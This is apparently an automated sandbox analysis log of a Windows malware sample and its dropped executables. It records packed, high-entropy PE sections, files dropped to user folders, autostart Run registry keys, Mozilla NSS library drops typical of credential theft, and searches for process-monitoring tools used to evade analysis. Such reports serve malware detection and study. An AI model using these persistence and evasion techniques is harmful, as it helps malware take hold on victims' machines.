                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: rstrtmgr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: ncrypt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: ntasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: iertutil.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: winhttp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: winnsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: urlmon.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: srvcli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: netutils.dll
                          Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                          Source: file.exeStatic file information: File size 1823744 > 1048576
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                          Source: file.exeStatic PE information: Raw size of oswdvyxj is bigger than: 0x100000 < 0x1a3600
                          Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2761247408.000000006C9ED000.00000002.00000001.01000000.0000000A.sdmp
                          Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2761636482.000000006CBAF000.00000002.00000001.01000000.00000009.sdmp
                          Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2761636482.000000006CBAF000.00000002.00000001.01000000.00000009.sdmp
                          Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2761247408.000000006C9ED000.00000002.00000001.01000000.0000000A.sdmp

                          Data Obfuscation

                          barindex
                          Detected unpacking (changes PE section rights)
                          Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.aa0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;oswdvyxj:EW;yfjgjzwe:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;oswdvyxj:EW;yfjgjzwe:EW;.taggant:EW;
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeUnpacked PE file: 21.2.EBFBFBFIIJ.exe.ed0000.0.unpack :EW;.rsrc:W;.idata :W;rzhrxold:EW;uyfmouti:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;rzhrxold:EW;uyfmouti:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 22.2.skotes.exe.880000.0.unpack :EW;.rsrc:W;.idata :W;rzhrxold:EW;uyfmouti:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;rzhrxold:EW;uyfmouti:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeUnpacked PE file: 25.2.rhnew.exe.d40000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bilyxzuf:EW;mhmmcaro:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bilyxzuf:EW;mhmmcaro:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exeUnpacked PE file: 26.2.e6d73861f4.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gmfbtxnb:EW;sbnkbdwx:EW;.taggant:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeUnpacked PE file: 27.2.fc1511c233.exe.e90000.0.unpack :EW;.rsrc:W;.idata :W; :EW;madnojdh:EW;rbwziktc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;madnojdh:EW;rbwziktc:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeUnpacked PE file: 28.2.6ae2430bb1.exe.8b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;oswdvyxj:EW;yfjgjzwe:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;oswdvyxj:EW;yfjgjzwe:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeUnpacked PE file: 32.2.fc1511c233.exe.e90000.0.unpack :EW;.rsrc:W;.idata :W; :EW;madnojdh:EW;rbwziktc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;madnojdh:EW;rbwziktc:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 34.2.skotes.exe.880000.0.unpack :EW;.rsrc:W;.idata :W;rzhrxold:EW;uyfmouti:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;rzhrxold:EW;uyfmouti:EW;.taggant:EW;
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C973480 ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ,GetCurrentProcess,GetProcessTimes,LoadLibraryW,GetProcAddress,__Init_thread_footer,__aulldiv,FreeLibrary,GetSystemTimeAsFileTime,0_2_6C973480
                          Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                          Source: f9882ce6c1.exe.22.drStatic PE information: real checksum: 0x2c0cbf should be: 0x2ccfac
                          Source: EBFBFBFIIJ.exe.0.drStatic PE information: real checksum: 0x322318 should be: 0x328eb6
                          Source: rhnew[1].exe.22.drStatic PE information: real checksum: 0x1c2a68 should be: 0x1c6289
                          Source: random[1].exe.0.drStatic PE information: real checksum: 0x322318 should be: 0x328eb6
                          Source: random[2].exe0.22.drStatic PE information: real checksum: 0x2c0cbf should be: 0x2ccfac
                          Source: random[1].exe0.22.drStatic PE information: real checksum: 0x1c059f should be: 0x1c40ce
                          Source: fc1511c233.exe.22.drStatic PE information: real checksum: 0x1c059f should be: 0x1c40ce
                          Source: random[2].exe.22.drStatic PE information: real checksum: 0x1bd493 should be: 0x1c977d
                          Source: rhnew.exe.22.drStatic PE information: real checksum: 0x1c2a68 should be: 0x1c6289
                          Source: random[1].exe.22.drStatic PE information: real checksum: 0x1dfbaa should be: 0x1d86b1
                          Source: file.exeStatic PE information: real checksum: 0x1bd493 should be: 0x1c977d
                          Source: e6d73861f4.exe.22.drStatic PE information: real checksum: 0x1dfbaa should be: 0x1d86b1
                          Source: 6ae2430bb1.exe.22.drStatic PE information: real checksum: 0x1bd493 should be: 0x1c977d
                          Source: skotes.exe.21.drStatic PE information: real checksum: 0x322318 should be: 0x328eb6
                          Source: file.exeStatic PE information: section name:
                          Source: file.exeStatic PE information: section name: .idata
                          Source: file.exeStatic PE information: section name:
                          Source: file.exeStatic PE information: section name: oswdvyxj
                          Source: file.exeStatic PE information: section name: yfjgjzwe
                          Source: file.exeStatic PE information: section name: .taggant
                          Source: nss3.dll.0.drStatic PE information: section name: .00cfg
                          Source: nss3[1].dll.0.drStatic PE information: section name: .00cfg
                          Source: softokn3.dll.0.drStatic PE information: section name: .00cfg
                          Source: softokn3[1].dll.0.drStatic PE information: section name: .00cfg
                          Source: random[1].exe.0.drStatic PE information: section name:
                          Source: random[1].exe.0.drStatic PE information: section name: .idata
                          Source: random[1].exe.0.drStatic PE information: section name: rzhrxold
                          Source: random[1].exe.0.drStatic PE information: section name: uyfmouti
                          Source: random[1].exe.0.drStatic PE information: section name: .taggant
                          Source: EBFBFBFIIJ.exe.0.drStatic PE information: section name:
                          Source: EBFBFBFIIJ.exe.0.drStatic PE information: section name: .idata
                          Source: EBFBFBFIIJ.exe.0.drStatic PE information: section name: rzhrxold
                          Source: EBFBFBFIIJ.exe.0.drStatic PE information: section name: uyfmouti
                          Source: EBFBFBFIIJ.exe.0.drStatic PE information: section name: .taggant
                          Source: freebl3.dll.0.drStatic PE information: section name: .00cfg
                          Source: freebl3[1].dll.0.drStatic PE information: section name: .00cfg
                          Source: mozglue.dll.0.drStatic PE information: section name: .00cfg
                          Source: mozglue[1].dll.0.drStatic PE information: section name: .00cfg
                          Source: msvcp140.dll.0.drStatic PE information: section name: .didat
                          Source: msvcp140[1].dll.0.drStatic PE information: section name: .didat
                          Source: skotes.exe.21.drStatic PE information: section name:
                          Source: skotes.exe.21.drStatic PE information: section name: .idata
                          Source: skotes.exe.21.drStatic PE information: section name: rzhrxold
                          Source: skotes.exe.21.drStatic PE information: section name: uyfmouti
                          Source: skotes.exe.21.drStatic PE information: section name: .taggant
                          Source: rhnew[1].exe.22.drStatic PE information: section name:
                          Source: rhnew[1].exe.22.drStatic PE information: section name: .idata
                          Source: rhnew[1].exe.22.drStatic PE information: section name:
                          Source: rhnew[1].exe.22.drStatic PE information: section name: bilyxzuf
                          Source: rhnew[1].exe.22.drStatic PE information: section name: mhmmcaro
                          Source: rhnew[1].exe.22.drStatic PE information: section name: .taggant
                          Source: rhnew.exe.22.drStatic PE information: section name:
                          Source: rhnew.exe.22.drStatic PE information: section name: .idata
                          Source: rhnew.exe.22.drStatic PE information: section name:
                          Source: rhnew.exe.22.drStatic PE information: section name: bilyxzuf
                          Source: rhnew.exe.22.drStatic PE information: section name: mhmmcaro
                          Source: rhnew.exe.22.drStatic PE information: section name: .taggant
                          Source: random[1].exe.22.drStatic PE information: section name:
                          Source: random[1].exe.22.drStatic PE information: section name: .idata
                          Source: random[1].exe.22.drStatic PE information: section name:
                          Source: random[1].exe.22.drStatic PE information: section name: gmfbtxnb
                          Source: random[1].exe.22.drStatic PE information: section name: sbnkbdwx
                          Source: random[1].exe.22.drStatic PE information: section name: .taggant
                          Source: e6d73861f4.exe.22.drStatic PE information: section name:
                          Source: e6d73861f4.exe.22.drStatic PE information: section name: .idata
                          Source: e6d73861f4.exe.22.drStatic PE information: section name:
                          Source: e6d73861f4.exe.22.drStatic PE information: section name: gmfbtxnb
                          Source: e6d73861f4.exe.22.drStatic PE information: section name: sbnkbdwx
                          Source: e6d73861f4.exe.22.drStatic PE information: section name: .taggant
                          Source: random[1].exe0.22.drStatic PE information: section name:
                          Source: random[1].exe0.22.drStatic PE information: section name: .idata
                          Source: random[1].exe0.22.drStatic PE information: section name:
                          Source: random[1].exe0.22.drStatic PE information: section name: madnojdh
                          Source: random[1].exe0.22.drStatic PE information: section name: rbwziktc
                          Source: random[1].exe0.22.drStatic PE information: section name: .taggant
                          Source: fc1511c233.exe.22.drStatic PE information: section name:
                          Source: fc1511c233.exe.22.drStatic PE information: section name: .idata
                          Source: fc1511c233.exe.22.drStatic PE information: section name:
                          Source: fc1511c233.exe.22.drStatic PE information: section name: madnojdh
                          Source: fc1511c233.exe.22.drStatic PE information: section name: rbwziktc
                          Source: fc1511c233.exe.22.drStatic PE information: section name: .taggant
                          Source: random[2].exe.22.drStatic PE information: section name:
                          Source: random[2].exe.22.drStatic PE information: section name: .idata
                          Source: random[2].exe.22.drStatic PE information: section name:
                          Source: random[2].exe.22.drStatic PE information: section name: oswdvyxj
                          Source: random[2].exe.22.drStatic PE information: section name: yfjgjzwe
                          Source: random[2].exe.22.drStatic PE information: section name: .taggant
                          Source: 6ae2430bb1.exe.22.drStatic PE information: section name:
                          Source: 6ae2430bb1.exe.22.drStatic PE information: section name: .idata
                          Source: 6ae2430bb1.exe.22.drStatic PE information: section name:
                          Source: 6ae2430bb1.exe.22.drStatic PE information: section name: oswdvyxj
                          Source: 6ae2430bb1.exe.22.drStatic PE information: section name: yfjgjzwe
                          Source: 6ae2430bb1.exe.22.drStatic PE information: section name: .taggant
                          Source: random[2].exe0.22.drStatic PE information: section name:
                          Source: random[2].exe0.22.drStatic PE information: section name: .idata
                          Source: random[2].exe0.22.drStatic PE information: section name: ixufepqn
                          Source: random[2].exe0.22.drStatic PE information: section name: zktzdkxq
                          Source: random[2].exe0.22.drStatic PE information: section name: .taggant
                          Source: f9882ce6c1.exe.22.drStatic PE information: section name:
                          Source: f9882ce6c1.exe.22.drStatic PE information: section name: .idata
                          Source: f9882ce6c1.exe.22.drStatic PE information: section name: ixufepqn
                          Source: f9882ce6c1.exe.22.drStatic PE information: section name: zktzdkxq
                          Source: f9882ce6c1.exe.22.drStatic PE information: section name: .taggant
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9AB536 push ecx; ret 0_2_6C9AB549
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeCode function: 21_2_00EED91C push ecx; ret 21_2_00EED92F
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeCode function: 21_2_00EE1359 push es; ret 21_2_00EE135A
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 22_2_0089D91C push ecx; ret 22_2_0089D92F
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 22_2_0089DFC6 push ecx; ret 22_2_0089DFD9
                          Source: file.exeStatic PE information: section name: oswdvyxj entropy: 7.9524320953649505
                          Source: random[1].exe.0.drStatic PE information: section name: entropy: 7.150492851188311
                          Source: EBFBFBFIIJ.exe.0.drStatic PE information: section name: entropy: 7.150492851188311
                          Source: skotes.exe.21.drStatic PE information: section name: entropy: 7.150492851188311
                          Source: rhnew[1].exe.22.drStatic PE information: section name: entropy: 7.966923946029537
                          Source: rhnew[1].exe.22.drStatic PE information: section name: bilyxzuf entropy: 7.953103309270847
                          Source: rhnew.exe.22.drStatic PE information: section name: entropy: 7.966923946029537
                          Source: rhnew.exe.22.drStatic PE information: section name: bilyxzuf entropy: 7.953103309270847
                          Source: random[1].exe.22.drStatic PE information: section name: gmfbtxnb entropy: 7.936788997233131
                          Source: e6d73861f4.exe.22.drStatic PE information: section name: gmfbtxnb entropy: 7.936788997233131
                          Source: random[1].exe0.22.drStatic PE information: section name: entropy: 7.978695116148034
                          Source: random[1].exe0.22.drStatic PE information: section name: madnojdh entropy: 7.953351845179029
                          Source: fc1511c233.exe.22.drStatic PE information: section name: entropy: 7.978695116148034
                          Source: fc1511c233.exe.22.drStatic PE information: section name: madnojdh entropy: 7.953351845179029
                          Source: random[2].exe.22.drStatic PE information: section name: oswdvyxj entropy: 7.9524320953649505
                          Source: 6ae2430bb1.exe.22.drStatic PE information: section name: oswdvyxj entropy: 7.9524320953649505
                          Source: random[2].exe0.22.drStatic PE information: section name: entropy: 7.8100154622136255
                          Source: f9882ce6c1.exe.22.drStatic PE information: section name: entropy: 7.8100154622136255

                          Persistence and Installation Behavior

                          barindex
                          Drops PE files to the document folder of the user
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Documents\EBFBFBFIIJ.exeJump to dropped file
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\freebl3[1].dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1012283001\f9882ce6c1.exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\vcruntime140[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\nss3[1].dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\mozglue[1].dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\msvcp140[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[2].exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\softokn3[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Documents\EBFBFBFIIJ.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\rhnew[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file

                          Boot Survival

                          barindex
                          Creates multiple autostart registry keys
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1b3b76c439.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 6ae2430bb1.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fc1511c233.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run f9882ce6c1.exeJump to behavior
                          Monitors registry run keys for changes
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
                          Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
